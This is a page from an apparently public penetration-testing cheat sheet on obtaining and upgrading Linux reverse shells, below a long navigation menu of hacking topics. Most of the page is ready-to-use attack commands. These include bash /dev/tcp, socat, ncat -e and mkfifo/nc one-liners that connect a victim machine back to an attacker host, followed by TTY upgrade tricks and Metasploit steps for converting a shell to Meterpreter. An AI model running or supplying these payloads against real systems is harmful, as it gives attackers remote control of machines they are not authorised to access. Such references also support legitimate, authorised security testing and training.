Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • Bash
  • Socat TTY Shell
  • Ncat
  • Mkfifo
  • Upgrading Normal Shells to TTY shells
  • Switch From ZSH To Bash
  • Upgrade the Shell Using Python
  • Upgrade the Shell Without Python
  • Upgrading Normal Shells to Meterpreter

Was this helpful?

  1. Post Exploitation
  2. Linux

Shells

PreviousPort ForwardingNextLinux Privilege Escalation

Last updated 2 years ago

Was this helpful?

Bash

The classic bash-based reverse shell:

/bin/bash -i >& /dev/tcp/TargetIP/TargetPort 0>&1

Note: If the payload doesn't work because redirection or ampersand symbols behave weird in the vulnerable application, then base64 encoding the payload often works well.

Socat TTY Shell

Do this for a full socat shell, no need to upgrade it. You need socat installed or a socat static binary for this, though.

On kali:

socat file:`tty`,raw,echo=0 tcp-listen:4444

On the victim machine:

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP_ADDRESS_HERE:4444

Once the connection is made, you probably want to increase the terminal size (run in the reverse shell on the victim machine):

stty rows 57 cols 211

Ncat

Listen to port 8001 on attacker machine:

sudo nc -lnvp 8001

Run ncat on the victim machine:

ncat ATTACKER_IP_HERE 8001 -e /bin/bash

Note: The command is ncat, not nc or netcat. There is a difference!

Mkfifo

sh-based mkfifo reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP_HERE ATTACKER_PORT_HERE >/tmp/f

Upgrading Normal Shells to TTY shells

Switch From ZSH To Bash

Warning: This doesn't work if your attacking machine uses zsh!

You can temporarily switch to bash:

exec bash --login

You can confirm you're using bash with:

ps -p $$

Upgrade the Shell Using Python

Run this in the reverse shell to upgrade it. Don't worry if your terminal turns weird temporarily.

python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

Upgrade the Shell Without Python

script -qc "/bin/bash -i" /dev/null
CTRL+Z
stty raw -echo
fg
export TERM=xterm

Upgrading Normal Shells to Meterpreter

Run msfconsole. Create a listener using multi/handler:

use exploit/multi/handler
set lhost YOUR_IP_ADDRESS
set lport 4444
run

Then use one of the above reverse shells to connect to the listener. Once you have the shell, press CTRL + Z to background the shell session. It will tell you the session number. Keep that in mind.

Next:

use post/multi/manage/shell_to_meterpreter
set session SESSION_NUMBER
run

Once the upgrade finishes, you'll be able to see your new session:

sessions -l

Note: There's a long-standing bug where it seems to get stuck on "Stopping exploit/multi/handler". Just press enter, it's not actually stuck.

Interact with the new session with:

sessions -i NEW_SESSION_NUMBER
Shells - LinuxHackTricks
Normal Shells
Full TTYsHackTricks
Full TTY Shells
Logo
Logo